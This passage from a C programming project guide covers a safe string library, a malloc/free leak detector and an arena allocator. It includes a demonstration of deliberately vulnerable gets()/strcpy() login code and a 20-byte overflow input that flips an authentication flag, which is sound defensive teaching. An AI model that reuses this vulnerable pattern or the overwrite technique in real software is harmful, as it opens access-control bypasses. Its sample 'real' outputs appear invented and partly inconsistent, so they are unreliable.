When you run your safe string library test suite, you’ll see comprehensive output demonstrating how your library prevents the buffer overflows that plague unsafe C string functions. Here are the real terminal outputs you’ll produce:
Example 1: Safe vs Unsafe String Copy Comparison
$ ./test_safe_strings
=== TESTING SAFE STRING LIBRARY ===
[TEST 1: Basic safe_strcpy]
Source: "Hello, World!" (13 chars + null = 14 bytes)
Destination buffer size: 20 bytes
Result: ✓ PASS
Copied: "Hello, World!"
Bytes written: 14
Buffer remaining: 6 bytes
[TEST 2: Overflow Prevention]
Source: "This is a very long string that will not fit!" (46 chars)
Destination buffer size: 10 bytes
safe_strcpy result: ✓ PREVENTED OVERFLOW
Truncated to: "This is a"
Bytes written: 10 (including null terminator)
Original length: 46
Truncated: 36 characters
Warning: String was truncated!
COMPARISON - What strcpy() would do:
Running with standard strcpy()...
Source: "This is a very long string that will not fit!"
Destination buffer: [10 bytes]
CRASH! Segmentation fault (core dumped)
==12345==ERROR: AddressSanitizer: stack-buffer-overflow
WRITE of size 47 at 0x7ffc8b2a1234
Buffer size: 10 bytes
Attempted write: 47 bytes
Overflow: 37 bytes beyond buffer!
Adjacent memory corrupted:
Variable 'canary' was: 0xDEADBEEF
Variable 'canary' now: 0x676E6F6C ← CORRUPTED!
Example 2: Safe String Concatenation
$ ./test_safe_strings --test-concat
[TEST 3: safe_strcat - Normal Operation]
Initial string: "Hello" (5 chars, buffer size: 50)
Concatenating: ", World!" (8 chars)
Result: ✓ PASS
Final string: "Hello, World!"
Total length: 13 chars
Buffer capacity: 50 bytes
Space remaining: 36 bytes
[TEST 4: safe_strcat - Overflow Prevention]
Initial string: "Hello" (5 chars, buffer size: 10)
Concatenating: ", this won't fit!" (17 chars)
Result: ✓ PREVENTED OVERFLOW
Attempted total: 22 chars
Buffer capacity: 10 bytes
Final string: "Hello, th"
Truncated: 13 characters dropped
Return code: -1 (EOVERFLOW)
Error message: "safe_strcat: insufficient space in destination buffer"
COMPARISON - Standard strcat():
$ ./test_unsafe_concat
Segmentation fault
Memory corruption detected at 0x7ffc8b2a1250
Stack smashing detected: <unknown> terminated
Aborted (core dumped)
Example 3: Null Terminator Detection
$ ./test_safe_strings --test-strlen
[TEST 5: safe_strlen with valid strings]
String: "Hello"
safe_strlen() = 5
strlen() = 5
✓ MATCH
[TEST 6: safe_strlen with missing null terminator]
Buffer: ['H','e','l','l','o','W','o','r','l','d'] (no \0!)
Buffer size: 10 bytes
safe_strlen with max_len=10:
⚠️ WARNING: No null terminator found within 10 bytes
Returned: -1 (ERROR)
Error message: "String not properly terminated"
Standard strlen() on same buffer:
Returned: 47 ← WRONG! Read past buffer end!
AddressSanitizer: heap-buffer-overflow
READ of size 1 at address beyond allocation
Demonstration:
Buffer ends at: 0x7ffeefbff49a
strlen() read until: 0x7ffeefbff4c9 (47 bytes past buffer!)
Accessed memory it shouldn't: YES
Undefined behavior: YES
Example 4: Complete Test Suite Output
$ ./run_all_tests
=== SAFE STRING LIBRARY TEST SUITE ===
Testing safe_strlen():
[✓] Normal strings (10/10 tests passed)
[✓] Empty strings (5/5 tests passed)
[✓] Missing null terminators detected (8/8 tests passed)
[✓] Maximum length handling (6/6 tests passed)
Testing safe_strcpy():
[✓] Normal copy operations (15/15 tests passed)
[✓] Truncation when needed (12/12 tests passed)
[✓] Return value correctness (10/10 tests passed)
[✓] Always null-terminates (20/20 tests passed)
[✗] FAILED: Edge case with size=0 (1/5 tests failed)
Testing safe_strcat():
[✓] Concatenation within bounds (18/18 tests passed)
[✓] Overflow prevention (10/10 tests passed)
[✓] Pre-existing string handling (8/8 tests passed)
Testing safe_substr():
[✓] Valid substring extraction (15/15 tests passed)
[✓] Out-of-bounds detection (12/12 tests passed)
[✓] Length limiting (9/9 tests passed)
=== COMPARISON WITH STANDARD LIBRARY ===
Buffer overflow attempts caught by safe library: 45
- strcpy overflows prevented: 18
- strcat overflows prevented: 15
- Read-past-end prevented: 12
Same tests with standard library:
- Crashes: 38
- Silent corruption: 7
- Correct behavior: 0 (all would overflow!)
AddressSanitizer detected issues: 45/45
All issues were prevented by safe_string library!
=== SUMMARY ===
Total tests: 153
Passed: 152
Failed: 1
Success rate: 99.3%
Memory safety: 100% (0 leaks, 0 use-after-free, 0 buffer overflows)
The safe_string library successfully prevents all buffer overflows
that would crash or corrupt memory with standard C string functions!
Example 5: Real-World Security Demonstration
$ ./demo_exploit_prevention
=== BUFFER OVERFLOW EXPLOIT DEMONSTRATION ===
Scenario: Login bypass via buffer overflow
----------------------------------------
Vulnerable code using strcpy():
char password[16];
int authenticated = 0;
printf("Enter password: ");
gets(password); // or strcpy(password, user_input)
if (authenticated) { grant_access(); }
[ATTACK 1: Standard strcpy]
Input: "AAAAAAAAAAAAAAAA\x01\x00\x00\x00" (20 bytes)
Memory before:
0x7ffc1000: [password buffer - 16 bytes]
0x7ffc1010: [authenticated = 0x00000000]
Memory after strcpy():
0x7ffc1000: [A A A A A A A A A A A A A A A A]
0x7ffc1010: [01 00 00 00] ← authenticated OVERWRITTEN!
Result: Access granted! (SECURITY BREACH)
[ATTACK 2: Using safe_strcpy instead]
Input: Same 20-byte attack string
safe_strcpy(password, input, sizeof(password)):
⚠️ Input length (20) exceeds buffer size (16)
✓ Truncated to 15 chars + null terminator
✓ Adjacent memory protected
Memory after safe_strcpy():
0x7ffc1000: [A A A A A A A A A A A A A A A \0]
0x7ffc1010: [00 00 00 00] ← authenticated UNCHANGED!
Result: Access denied (ATTACK PREVENTED)
Your safe string library prevents the buffer overflow exploit!
These outputs demonstrate that you’ve built a production-quality safe string library that prevents the exact vulnerabilities responsible for countless real-world security breaches. Your library catches errors before they corrupt memory and provides clear diagnostic information.
Learning milestones:
- First milestone: You understand that
"hello"is actually 6 bytes, not 5 - Second milestone: You can explain exactly why
strcpy(small_buffer, huge_string)corrupts memory - Final milestone: You instinctively check buffer sizes before any string operation
The Core Question You’re Answering
“Why is
strcpyconsidered dangerous, and what would a safe version look like?”
C strings are the source of more security vulnerabilities than almost any other language feature. By building safe alternatives, you’ll understand exactly why—and gain the instinct to think about buffer sizes before every string operation.
Concepts You Must Understand First
Stop and research these before coding:
- What IS a C String?
- How is a string stored in memory? (Sequence of bytes + null terminator)
- What is the null terminator and why is it essential? (
\0= byte value 0) - What happens if there’s no null terminator?
- Book Reference: “The C Programming Language” Ch. 5.5 - Kernighan & Ritchie
String Null Terminator Visualization:
How "hello" is ACTUALLY stored in memory (6 bytes, not 5!):
String Literal: "hello"
Memory Layout:
Address: 0x1000 0x1001 0x1002 0x1003 0x1004 0x1005
┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes: │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ '\0'│
└─────┴─────┴─────┴─────┴─────┴─────┘
Hex: 0x68 0x65 0x6C 0x6C 0x6F 0x00
▲
│
Null terminator (essential!)
strlen("hello") = 5 (counts chars before '\0')
sizeof("hello") = 6 (includes the '\0')
WITHOUT null terminator (DANGEROUS!):
Address: 0x1000 0x1001 0x1002 0x1003 0x1004 0x1005
┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes: │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ ??? │ ← No null terminator!
└─────┴─────┴─────┴─────┴─────┴─────┘
▲
│
strlen() keeps reading → UNDEFINED BEHAVIOR!
Could read garbage, could crash

- String Literals vs Character Arrays
- What’s the difference between
char* s = "hello"andchar s[] = "hello"? - Why can you modify one but not the other?
- Where do string literals live in memory? (Read-only data section)
- What’s the difference between
- Why Standard String Functions Are Dangerous
- Why does
strcpy(dest, src)not know the size ofdest? - What does
gets()do and why was it removed from the C standard? - What is a buffer overflow, mechanically?
- Book Reference: “Effective C” Ch. 7 - Robert Seacord
- Why does
- Pointer Arithmetic for Strings
- Why does
s + 1point to the second character? - How do you iterate through a string using pointers?
- What’s the difference between
*s++and(*s)++? - Book Reference: “The C Programming Language” Ch. 5.4 - Kernighan & Ritchie
- Why does
Questions to Guide Your Design
Before implementing, think through these:
- safe_strlen
- How does
strlenfind the end of a string? - What happens if someone passes a pointer to uninitialized memory?
- Should you add a maximum length parameter? Why or why not?
- How does
- safe_strcpy
- What parameters do you need to make this safe? (dest, src, AND dest_size)
- What should happen if src is longer than dest_size?
- Should you always null-terminate dest, even on truncation?
- What should the return value indicate?
- safe_strcat
- How much space is available in dest? (dest_size - strlen(dest) - 1)
- What if dest isn’t null-terminated when passed in?
- How do you handle the case where there’s no room to add anything?
- Error Handling
- Should errors return special values, or set a global error flag?
- What’s the trade-off between returning error codes vs silent truncation?
- How does
strlcpy(BSD) handle this differently thanstrncpy(POSIX)?
Thinking Exercise: Trace the Crash
Trace what happens with this code:
void vulnerable() {
char buffer[10];
char* input = "This string is way too long for the buffer";
strcpy(buffer, input); // What happens here?
printf("Buffer: %s\n", buffer);
}
Questions while tracing:
- Draw the stack frame for
vulnerable() - Where is
bufferlocated relative to the saved return address? - Which bytes get overwritten when
strcpyruns? - What value will the return address have after
strcpy? - What happens when the function tries to return?
Now trace with your safe version:
- What would
safe_strcpy(buffer, input, sizeof(buffer))do differently? - What should it return to indicate the problem?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What’s wrong with
strcpyand how would you fix it?” - “What is a buffer overflow? How does it lead to code execution?”
- “What’s the difference between
strncpyandstrlcpy?” - “Why does
"hello"take 6 bytes of memory?” - “How would you implement
strlenwithout using any library functions?” - “What happens if you pass a non-null-terminated string to
printf("%s", ...)?”
Hints in Layers (Only If Stuck)
Hint 1: Start with strlen
Implement `safe_strlen` first. It's just a loop that counts until it sees `\0`: ```c size_t safe_strlen(const char* s) { size_t len = 0; while (s[len] != '\0') { len++; } return len; } ``` But this still has a problem—what if `s` has no null terminator? Consider adding a maximum length parameter.Hint 2: The safe_strcpy Signature
You need three parameters: ```c size_t safe_strcpy(char* dest, const char* src, size_t dest_size); ``` Return the length that WOULD have been copied (like `snprintf`). This lets callers detect truncation: ```c if (safe_strcpy(buf, str, sizeof(buf)) >= sizeof(buf)) { // Truncation occurred! } ```Hint 3: Always Null-Terminate
Unlike `strncpy`, your function should ALWAYS null-terminate (if dest_size > 0). Even on truncation, dest should be a valid string.Hint 4: Test with AddressSanitizer
Compile with `-fsanitize=address` and test your library against the standard library: ```bash clang -fsanitize=address -g test_overflow.c -o test ./test ``` AddressSanitizer will catch buffer overflows that would otherwise silently corrupt memory.Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| C string fundamentals | “The C Programming Language” | Ch. 5.5 |
| Pointer arithmetic | “The C Programming Language” | Ch. 5.4 |
| String security issues | “Effective C” | Ch. 7 |
| Buffer overflow exploitation | “Hacking: The Art of Exploitation” | Ch. 3 |
| Secure string handling | “Secure Coding in C and C++” | Ch. 2 |
Project 3: Memory Leak Detector
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: C++, Rust, Zig
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: Level 1: The “Resume Gold”
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Management, Debugging
- Software or Tool: Valgrind, AddressSanitizer
- Main Book: Understanding and Using C Pointers by Richard Reese
What you’ll build: A wrapper around malloc/free that tracks all allocations, detects memory leaks, catches double-frees, and warns about use-after-free.
Why it teaches memory & control: This project forces you to understand ownership and lifetime. When is memory valid? When does it become garbage? How do bugs “appear later than the mistake”? You’ll build the same intuition that sanitizers provide, but by constructing it yourself.
Core challenges you’ll face:
- Maintaining a registry of all active allocations (maps to: object lifetime rules)
- Detecting when
free()is called twice on the same pointer (maps to: double free) - Marking freed memory to detect use-after-free (maps to: dangling pointers)
- Reporting file/line where allocation happened (maps to: why bugs appear later)
- Understanding the difference between NULL, uninitialized, and dangling (maps to: pointer states)
Resources for key challenges:
- Memory Allocators 101 by Arjun Sreedharan - Understanding malloc internals
- objc.io - Dancing in the Debugger - Inspecting memory state with lldb
Key Concepts: | Concept | Resource | |———|———-| | Object lifetime | “Understanding and Using C Pointers” Ch. 2 - Richard Reese | | Double-free mechanics | AddressSanitizer documentation - LLVM | | Use-after-free detection | malloc from Scratch - Tenzin Migmar |
Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Comfort with structs, linked lists, macros
Real World Outcome
When you complete this project, you’ll have a working memory leak detector that catches bugs at runtime. Here’s what the experience looks like:
Example 1: Detecting Memory Leaks
test_leak.c:
#include "leak_detector.h"
#include <stdio.h>
void create_user() {
char* name = malloc(100);
strcpy(name, "Alice");
// Oops, forgot to free!
}
int main() {
init_leak_detector();
for (int i = 0; i < 3; i++) {
create_user();
}
return 0;
}
Terminal output:
$ gcc -g test_leak.c leak_detector.c -o test_leak
$ ./test_leak
=== Memory Leak Detector Report ===
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004000
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004100
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004200
Total leaks: 3 allocations, 300 bytes
Example 2: Detecting Double-Free
test_double_free.c:
#include "leak_detector.h"
int main() {
init_leak_detector();
int* data = malloc(sizeof(int) * 10);
*data = 42;
free(data);
free(data); // BUG: Double free!
return 0;
}
Terminal output:
$ ./test_double_free
[ERROR] DOUBLE-FREE DETECTED!
Pointer: 0x600000004000
Size: 40 bytes
First freed at: test_double_free.c:9
Second free at: test_double_free.c:10
Originally allocated at: test_double_free.c:6
*** Program terminated to prevent heap corruption ***
Example 3: Detecting Use-After-Free
test_use_after_free.c:
#include "leak_detector.h"
#include <stdio.h>
int main() {
init_leak_detector();
int* numbers = malloc(5 * sizeof(int));
numbers[0] = 100;
printf("Before free: numbers[0] = %d\n", numbers[0]);
free(numbers);
// BUG: Accessing freed memory
printf("After free: numbers[0] = %d\n", numbers[0]);
return 0;
}
Terminal output:
$ ./test_use_after_free
Before free: numbers[0] = 100
[WARNING] POSSIBLE USE-AFTER-FREE DETECTED!
Reading from: 0x600000004000
This memory was freed at: test_use_after_free.c:11
Originally allocated at: test_use_after_free.c:7 (20 bytes)
Memory has been poisoned with pattern: 0xDEADBEEF
After free: numbers[0] = -559038737
Example 4: Clean Program (No Leaks)
test_clean.c:
#include "leak_detector.h"
#include <stdio.h>
void process_data() {
char* buffer = malloc(256);
strcpy(buffer, "Clean program!");
printf("%s\n", buffer);
free(buffer); // Properly freed!
}
int main() {
init_leak_detector();
process_data();
return 0;
}
Terminal output:
$ ./test_clean
Clean program!
=== Memory Leak Detector Report ===
No memory leaks detected!
Total allocations: 1
Total frees: 1
All memory properly cleaned up.
Step-by-Step: What You See
- During Development:
- Include your
leak_detector.hheader - Call
init_leak_detector()at program start - Your detector intercepts all
malloc()andfree()calls via macros
- Include your
- At Runtime:
- Each allocation is registered with file/line information
- Each free is validated against the registry
- Double-frees are caught immediately
- Freed memory is “poisoned” with 0xDEADBEEF pattern
- At Program Exit:
- The
atexit()handler runs automatically - All unfreed allocations are reported with their source locations
- You get a complete leak report without any extra work
- The
- Understanding the Output:
- File:Line - Shows exactly where
malloc()was called - Address - The actual memory address (helps correlate with debugger)
- Size - How many bytes were leaked
- Poisoning - Freed memory filled with 0xDE pattern makes use-after-free obvious
- File:Line - Shows exactly where
Learning milestones:
- First milestone: You understand why freeing memory doesn’t zero it out
- Second milestone: You can explain why use-after-free sometimes “works” and sometimes crashes
- Final milestone: You think about every
mallocin terms of “who frees this and when”
The Core Question You’re Answering
“Who owns this memory, and when does it become invalid?”
This is the fundamental question of memory management. In garbage-collected languages, the runtime handles this. In C, YOU handle it. And when you get it wrong, the bugs are often silent, appearing far from where the mistake was made.
Concepts You Must Understand First
Stop and research these before coding:
- Object Lifetime
- When does memory become “alive” (usable)?
- When does it become “dead” (invalid)?
- Why can you still read “dead” memory in C? (The bytes are still there!)
- Book Reference: “Understanding and Using C Pointers” Ch. 2 - Richard Reese
- The Three Pointer States
- NULL: Explicitly points to nothing (
int* p = NULL;) - Valid: Points to allocated, live memory
- Dangling: Points to memory that was freed—looks valid but isn’t
- Why is dangling the most dangerous? (No way to detect it!)
- NULL: Explicitly points to nothing (
- Why Bugs Appear Later Than Mistakes
- What happens immediately when you call
free(p)? (Almost nothing visible) - When does use-after-free actually crash? (When the memory is reused)
- Why is this timing unpredictable?
- Book Reference: “Effective C” Ch. 6 - Robert Seacord
- What happens immediately when you call
- Heap Allocator Metadata
- What does the allocator store alongside your data?
- How does
free(p)know how many bytes to free? - What happens when this metadata gets corrupted?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 9.9 - Bryant & O’Hallaron
Questions to Guide Your Design
Before implementing, think through these:
- Tracking Allocations
- What data structure will you use to track active allocations? (Hash table? Linked list?)
- What information do you need to store per allocation? (Address, size, file, line)
- How do you associate this metadata with the pointer the user receives?
- Wrapping malloc/free
- How do you intercept
mallocandfreecalls? - Option 1: Macros that redefine
mallocandfree - Option 2: Wrapper functions
my_malloc,my_free - How do you capture
__FILE__and__LINE__at the call site?
- How do you intercept
- Detecting Double-Free
- When
free(p)is called, how do you check ifpwas already freed? - Should you keep freed entries in your registry, or remove them?
- What if you keep them—how do you prevent the registry from growing forever?
- When
- Detecting Use-After-Free
- This is HARD without hardware support. What can you do?
- Option: Fill freed memory with a magic pattern (0xDEADBEEF)
- Option: Keep freed allocations in a “quarantine” before recycling
- Why can’t you catch all use-after-free at runtime?
- Detecting Leaks
- When do you report leaks? (At program exit)
- How do you ensure your leak report runs? (
atexit()) - What information makes a leak report useful?
Thinking Exercise: Trace the Bug
Trace what happens with this code:
void create_user() {
char* name = malloc(100);
strcpy(name, "Alice");
// Oops, forgot to free or return name
}
int main() {
for (int i = 0; i < 1000; i++) {
create_user();
}
// 100,000 bytes leaked!
return 0;
}
Questions while tracing:
- How would your detector report this leak?
- What file and line would you report?
- How much total memory was leaked?
Now trace this:
int main() {
int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p is now dangling
int* q = malloc(sizeof(int));
*q = 100;
// q might get the same address as p!
printf("*p = %d\n", *p); // Use-after-free!
// Might print 100, might print 42, might crash
}
Questions:
- Why might
*pprint100? - How could your detector catch this?
- What magic value could you write to freed memory?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is a memory leak? How do you detect them?”
- “What is use-after-free? Why is it dangerous for security?”
- “What is double-free? What can go wrong?”
- “How does Valgrind detect memory errors?”
- “What’s the difference between a dangling pointer and a NULL pointer?”
- “If you free memory, why can you sometimes still read from it?”
Hints in Layers (Only If Stuck)
Hint 1: Use Macros to Capture Call Site
Define macros that wrap your functions: ```c #define malloc(size) debug_malloc(size, __FILE__, __LINE__) #define free(ptr) debug_free(ptr, __FILE__, __LINE__) void* debug_malloc(size_t size, const char* file, int line); void debug_free(void* ptr, const char* file, int line); ``` Now every `malloc` call automatically captures where it happened.Hint 2: Simple Registry Structure
A linked list works fine for a learning project: ```c typedef struct Allocation { void* ptr; size_t size; const char* file; int line; int freed; // 0 = active, 1 = freed struct Allocation* next; } Allocation; static Allocation* registry = NULL; ```Hint 3: Poison Freed Memory
When freeing, fill the memory with a recognizable pattern: ```c void debug_free(void* ptr, ...) { Allocation* alloc = find_allocation(ptr); if (alloc) { memset(ptr, 0xDE, alloc->size); // Poison with 0xDE alloc->freed = 1; } free(ptr); } ``` If you later read `0xDEDEDEDE`, you know it's use-after-free.Hint 4: Report Leaks at Exit
Use `atexit()` to register a cleanup function: ```c void report_leaks() { for (Allocation* a = registry; a; a = a->next) { if (!a->freed) { printf("[LEAK] %zu bytes at %s:%d\n", a->size, a->file, a->line); } } } // In your init or first malloc: static int initialized = 0; if (!initialized) { atexit(report_leaks); initialized = 1; } ```Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| Pointer lifetime and ownership | “Understanding and Using C Pointers” | Ch. 2 |
| Heap allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| Memory debugging techniques | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 5 |
| Secure memory handling | “Effective C” | Ch. 6 |
| Valgrind and sanitizers | “The Linux Programming Interface” | Ch. 7 |
Project 4: Arena Allocator
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Zig, C++
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: Level 1: The “Resume Gold”
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Management, Allocators
- Software or Tool: mmap, Custom Memory Allocator
- Main Book: C Interfaces and Implementations by David Hanson
What you’ll build: A bump/arena allocator that allocates memory from a pre-allocated block, with O(1) allocation and bulk-free semantics.
Why it teaches memory & control: This is where you understand why allocators exist. You’ll see that malloc is just software—someone wrote it. By building the simplest possible allocator, you understand memory as a raw resource to be carved up, not a magic service.
Core challenges you’ll face:
- Requesting a large block from the OS with
mmapormalloc(maps to: why allocators exist) - Maintaining a “bump pointer” that advances with each allocation (maps to: heap layout)
- Handling alignment requirements (maps to: memory layout details)
- Implementing reset/free-all (maps to: lifetime management)
- Understanding when arena allocation is appropriate vs general-purpose (maps to: allocator design)
Resources for key challenges:
- Memory Allocators 101 by Arjun Sreedharan - Core allocator concepts
- Build Your Own Memory Allocator - Giovanni Iannaccone
Key Concepts: | Concept | Resource | |———|———-| | Arena/bump allocation | malloc() from Scratch - Tenzin Migmar | | Memory alignment | “Understanding and Using C Pointers” Ch. 1 - Richard Reese | | mmap system call | Master memory management - 42 Studio |
Difficulty: Intermediate Time estimate: Weekend - 1 week Prerequisites: Project 3 or understanding of malloc/free
Real World Outcome
When you complete this project, you’ll have a blazingly fast arena allocator that demonstrates the power of specialized memory management. Here’s what you’ll experience:
Example 1: Basic Arena Usage
test_arena.c:
#include "arena.h"
#include <stdio.h>
typedef struct {
char name[50];
int score;
} Player;
int main() {
// Create a 1MB arena
Arena* arena = arena_create(1024 * 1024);
printf("Arena created: %zu bytes\n\n", arena->capacity);
// Allocate some players
Player* p1 = arena_alloc(arena, sizeof(Player));
strcpy(p1->name, "Alice");
p1->score = 100;
printf("After allocating p1:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
Player* p2 = arena_alloc(arena, sizeof(Player));
strcpy(p2->name, "Bob");
p2->score = 200;
printf("After allocating p2:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
int* scores = arena_alloc(arena, 100 * sizeof(int));
printf("After allocating 100 integers:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
// Reset everything at once - O(1)!
arena_reset(arena);
printf("After arena_reset():\n");
printf(" Used: %zu bytes (back to zero!)\n", arena->offset);
printf(" Free: %zu bytes (all available again!)\n\n", arena->capacity - arena->offset);
arena_destroy(arena);
return 0;
}
Terminal output:
$ gcc -g test_arena.c arena.c -o test_arena
$ ./test_arena
Arena created: 1048576 bytes
After allocating p1:
Used: 54 bytes
Free: 1048522 bytes
After allocating p2:
Used: 108 bytes
Free: 1048468 bytes
After allocating 100 integers:
Used: 508 bytes
Free: 1048068 bytes
After arena_reset():
Used: 0 bytes (back to zero!)
Free: 1048576 bytes (all available again!)
Example 2: Visual Bump Pointer Advancement
test_visual.c:
#include "arena.h"
#include <stdio.h>
void print_arena_state(Arena* arena, const char* label) {
printf("%s\n", label);
printf("├─ Base: %p\n", (void*)arena->base);
printf("├─ Current: %p (base + %zu)\n",
(void*)(arena->base + arena->offset), arena->offset);
printf("├─ Capacity: %zu bytes\n", arena->capacity);
printf("└─ Used: %.2f%%\n\n",
(arena->offset * 100.0) / arena->capacity);
}
int main() {
Arena* arena = arena_create(1024);
print_arena_state(arena, "Initial state:");
void* a = arena_alloc(arena, 100);
print_arena_state(arena, "After arena_alloc(100):");
void* b = arena_alloc(arena, 200);
print_arena_state(arena, "After arena_alloc(200):");
void* c = arena_alloc(arena, 300);
print_arena_state(arena, "After arena_alloc(300):");
arena_destroy(arena);
return 0;
}
Terminal output:
$ ./test_visual
Initial state:
├─ Base: 0x100204000
├─ Current: 0x100204000 (base + 0)
├─ Capacity: 1024 bytes
└─ Used: 0.00%
After arena_alloc(100):
├─ Base: 0x100204000
├─ Current: 0x100204064 (base + 100)
├─ Capacity: 1024 bytes
└─ Used: 9.77%
After arena_alloc(200):
├─ Base: 0x100204000
├─ Current: 0x1002040c8 (base + 300)
├─ Capacity: 1024 bytes
└─ Used: 29.30%
After arena_alloc(300):
├─ Base: 0x100204000
├─ Current: 0x10020412c (base + 600)
├─ Capacity: 1024 bytes
└─ Used: 58.59%
Example 3: Performance Benchmark vs malloc
benchmark.c:
#include "arena.h"
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#define ITERATIONS 1000000
void benchmark_malloc() {
clock_t start = clock();
void* ptrs[100];
for (int i = 0; i < ITERATIONS; i++) {
for (int j = 0; j < 100; j++) {
ptrs[j] = malloc(64);
}
for (int j = 0; j < 100; j++) {
free(ptrs[j]);
}
}
clock_t end = clock();
double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
printf("malloc/free: %.3f seconds\n", elapsed);
}
void benchmark_arena() {
clock_t start = clock();
Arena* arena = arena_create(64 * 100); // Big enough for 100 allocations
for (int i = 0; i < ITERATIONS; i++) {
for (int j = 0; j < 100; j++) {
arena_alloc(arena, 64);
}
arena_reset(arena); // O(1) reset!
}
arena_destroy(arena);
clock_t end = clock();
double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
printf("Arena alloc: %.3f seconds\n", elapsed);
}
int main() {
printf("Benchmarking %d iterations of 100 allocations each...\n\n", ITERATIONS);
benchmark_malloc();
benchmark_arena();
return 0;
}
Terminal output:
$ gcc -O2 benchmark.c arena.c -o benchmark
$ ./benchmark
Benchmarking 1000000 iterations of 100 allocations each...
malloc/free: 8.342 seconds
Arena alloc: 0.241 seconds
Arena is 34.6x faster!
Example 4: Real-World Game Frame Simulation
game_frame.c:
#include "arena.h"
#include <stdio.h>
#include <stdlib.h>
typedef struct {
float x, y, z;
} Vector3;
typedef struct {
char name[32];
Vector3 position;
Vector3 velocity;
} Entity;
void simulate_frame(Arena* frame_arena, int frame_num) {
// Allocate temporary data for this frame
Entity* entities = arena_alloc(frame_arena, 1000 * sizeof(Entity));
Vector3* temp_vectors = arena_alloc(frame_arena, 500 * sizeof(Vector3));
char* debug_buffer = arena_alloc(frame_arena, 4096);
// Simulate frame...
snprintf(debug_buffer, 4096, "Frame %d: 1000 entities, 500 vectors", frame_num);
printf("Frame %d - Arena used: %zu bytes\n", frame_num, frame_arena->offset);
// At end of frame, reset everything - O(1)!
// No need to free individual allocations
}
int main() {
Arena* frame_arena = arena_create(1024 * 1024); // 1MB per frame
printf("Simulating game frames...\n\n");
for (int i = 0; i < 5; i++) {
simulate_frame(frame_arena, i + 1);
arena_reset(frame_arena); // Reset for next frame
printf(" Reset complete - ready for next frame\n\n");
}
arena_destroy(frame_arena);
printf("Game simulation complete!\n");
return 0;
}
Terminal output:
$ ./game_frame
Simulating game frames...
Frame 1 - Arena used: 90128 bytes
Reset complete - ready for next frame
Frame 2 - Arena used: 90128 bytes
Reset complete - ready for next frame
Frame 3 - Arena used: 90128 bytes
Reset complete - ready for next frame
Frame 4 - Arena used: 90128 bytes
Reset complete - ready for next frame
Frame 5 - Arena used: 90128 bytes
Reset complete - ready for next frame
Game simulation complete!
Step-by-Step: What You See
- Arena Creation:
- Request large memory block from OS via
mmap() - Initialize with base pointer, offset=0, capacity
- One syscall vs many for individual mallocs
- Request large memory block from OS via
- Allocation Pattern:
- Watch the offset (bump pointer) advance with each allocation
- No searching for free blocks - just increment!
- O(1) allocation every time
- The O(1) Reset Magic:
arena_reset()just sets offset back to 0- All allocations “disappear” instantly
- Memory is reused without any syscalls
- Performance Benefits:
- See 10-100x speedup for batch allocation patterns
- Perfect for frame-based workloads (games, request handlers)
- Zero fragmentation within arena lifetime
- Visual Understanding:
- Base pointer never changes
- Current pointer = base + offset
- Reset moves current back to base
- Like rewinding a tape - instant and free!
Learning milestones:
- First milestone: You understand that
mallocis just software managing a byte array - Second milestone: You can explain the tradeoff between flexibility and performance in allocators
- Final milestone: You see memory as a resource to be managed, not a magic service
The Core Question You’re Answering
“What if I could allocate memory with just a pointer increment, and free everything at once?”
This is the arena allocator’s insight. It trades flexibility (individual frees) for speed (O(1) allocation, O(1) bulk free). By building one, you understand that malloc is just one way to manage memory—and often not the best way.
Concepts You Must Understand First
Stop and research these before coding:
- Why Allocators Exist
- Why can’t you just ask the OS for memory every time you need it?
- What’s the overhead of a syscall vs a function call?
- Why does
mallocbatch requests to the OS? - Book Reference: “Operating Systems: Three Easy Pieces” Ch. 17 - Arpaci-Dusseau
- The Bump Allocator (Simplest Possible)
- What is a bump pointer?
- Why is bump allocation O(1)?
- What’s the downside? (You can’t free individual allocations)
- When is this acceptable? (Short-lived, batch allocations)
- Memory Alignment
- Why must some data types start at specific addresses?
- What happens if you store an
intat an odd address? (Crash on some CPUs!) - How do you “round up” a pointer to the next aligned address?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.9.3 - Bryant & O’Hallaron
- Getting Memory from the OS
- What is
mmapand when do you use it? - What’s the difference between
mmapandsbrk? - Why might you prefer
mmapfor an arena? - Book Reference: “The Linux Programming Interface” Ch. 49 - Michael Kerrisk
- What is
Questions to Guide Your Design
Before implementing, think through these:
- Arena Structure
- What fields does your Arena struct need?
- At minimum: base pointer, current offset, and capacity
- Should you store alignment? Should you allow multiple blocks?
- Allocation
- How do you “bump” the pointer?
- What if the requested size exceeds remaining space?
- How do you handle alignment for different types?
- Reset vs Destroy
- What does
arena_resetdo? (Set offset back to 0) - What does
